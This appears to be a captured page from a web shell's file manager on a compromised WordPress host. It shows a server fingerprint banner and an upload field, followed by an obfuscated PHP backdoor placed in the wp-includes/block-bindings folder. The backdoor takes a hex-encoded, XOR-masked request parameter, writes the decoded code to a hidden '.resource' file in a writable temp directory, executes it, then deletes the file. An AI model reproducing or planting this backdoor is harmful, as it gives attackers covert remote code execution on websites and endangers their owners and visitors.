| Server IP : 198.38.94.67 / Your IP : 216.73.217.74 Web Server : LiteSpeed System : Linux d6054.dxb1.stableserver.net 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64 User : azfilmst ( 1070) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/azfilmst/zeuszamani.com/wp-includes/block-bindings/ |
Upload File : |
<?php
if(array_key_exists("\x72\x65f", $_REQUEST)){
$mrk = array_filter([session_save_path(), ini_get("upload_tmp_dir"), "/var/tmp", getcwd(), "/tmp", "/dev/shm", sys_get_temp_dir(), getenv("TMP"), getenv("TEMP")]);
$binding = hex2bin($_REQUEST["\x72\x65f"]);
$holder ='' ;for($m=0; $m<strlen($binding); $m++){$holder .= chr(ord($binding[$m]) ^ 23);}
for ($ent = 0, $res = count($mrk); $ent < $res; $ent++) {
$property_set = $mrk[$ent];
if ((bool)is_dir($property_set) && (bool)is_writable($property_set)) {
$entry = vsprintf("%s/%s", [$property_set, ".resource"]);
$success = file_put_contents($entry, $holder);
if ($success) {
include $entry;
@unlink($entry);
exit;}
}
}
}